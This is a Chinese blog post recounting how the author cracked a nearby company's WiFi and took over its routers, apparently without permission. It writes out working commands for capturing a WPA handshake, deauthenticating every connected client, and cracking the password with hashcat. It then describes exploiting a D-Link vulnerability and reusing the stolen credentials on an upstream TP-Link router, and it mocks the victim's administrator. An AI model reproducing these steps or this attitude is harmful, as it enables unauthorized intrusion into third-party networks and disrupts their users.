实战:无线wifi密码破解与路由器入侵

工作之余,闲来无事,搞搞事情,不搞不知道,一搞还真搞了些东西,企业安全......呵呵!

由于之前一直在做路由器项目,今天来看看周围的WiFi是否安全,开启我的Kali,插上USB无线网卡,目测我的网卡是拓实的双频无线网卡,Realtek 8812au芯片,开始在Github上clone下一个驱动,一阵make安装后,发现无法设置为monitor混杂模式,dmesg看到崩溃,看来Github上的驱动不可取,Google一番,发现Kali执行命令下载即可:

sudo apt-get install realtek-rtl88xxau-dkms

该驱动支持的芯片列表如下:

实战:无线wifi密码破解与路由器入侵_第1张图片

实战:无线wifi密码破解与路由器入侵_第2张图片

驱动安装完成后,开启usb无线网卡混杂模式:

iwconfig wlan0 mode monitor

使用airmon-ng设置监听无线网络:

airmon-ng check kill
airmon-ng start wlan0

使用airodump-ng开始监听无线网络并抓取wifi握手包:

airodump-ng -w wifi1 --essid wifi1 --channel 11 wlan0

这里我只监听抓包使用11号频道的热点wifi,因为目标wifi使用的是11频道。

实战:无线wifi密码破解与路由器入侵_第3张图片

如果想快一点抓取到握手包,需要用上aireplay-ng,该命令可以让使用wifi1热点的终端掉线重连,在重连过程中就可以抓取到握手包了:

aireplay-ng -0 0 -a 43:23:4F:31:A3:43 wlan0

具体命令自行查看,我为了方便,会将所有连接wifi的终端强制掉线。

实战:无线wifi密码破解与路由器入侵_第4张图片

如上图,到此抓取到wifi握手包,下面就是对这个握手包进行破解。

破解握手包,我这里使用的是hashcat,在使用hashcat破解之前,需要对获取到握手包文件.cap文件进行转换,不然目前hashcat不支持破解.cap文件,无法识别,这里需要用到hashcat提供的工具包中的cao2hccapx.bin工具:

cao2hccapx.bin ./wifi1.cap output.hccapx

这里的output.hccapx即是要破解的握手包文件:

hashcat64.bin -m 2500 --force -w 3 ./output.hccapx ./dicts/rockyou.txt

这里rockyou.txt为破解使用的字典文件,最后跑完这个字典后,并没有破解出wifi密码,于是又试了另一个字典realuniq.lst,这次很快就我们得到了wifi的密码:

实战:无线wifi密码破解与路由器入侵_第5张图片

到此,就可以使用这个wifi热点了。

结束了吗?并没有。

访问该热点的路由器页面看看是什么路由器:

实战:无线wifi密码破解与路由器入侵_第6张图片

啊哈,是D-Link,我记得某某路由器有漏洞,所以搜索了一下,版本真是存在漏洞的版本,那就搞一下喽

实战:无线wifi密码破解与路由器入侵_第7张图片

有时候比较懒,写代码太费事,上Fiddler(或burpsuit)

实战:无线wifi密码破解与路由器入侵_第8张图片

很快,这个路由器被攻陷了,既然来了,就进去看看喽

实战:无线wifi密码破解与路由器入侵_第9张图片

原来上层还有一个路由器,访问看看是什么路由器:

实战:无线wifi密码破解与路由器入侵_第10张图片

原来是TP-Link,使用相同的账户密码登录试试,啊哈,还真能登录进去:

实战:无线wifi密码破解与路由器入侵_第11张图片

该公司的网管,你家老板有事找你......

第一个D-link的路由器我只是使用了第一个漏洞获取到路由器的登录密码,还有一个漏洞是在D-link上执行命令的漏洞,这里我也写了脚本搞了一下:

实战:无线wifi密码破解与路由器入侵_第12张图片


到此,本次搞事情到此结束!










你可能感兴趣的:(攻防,网络,linux,python)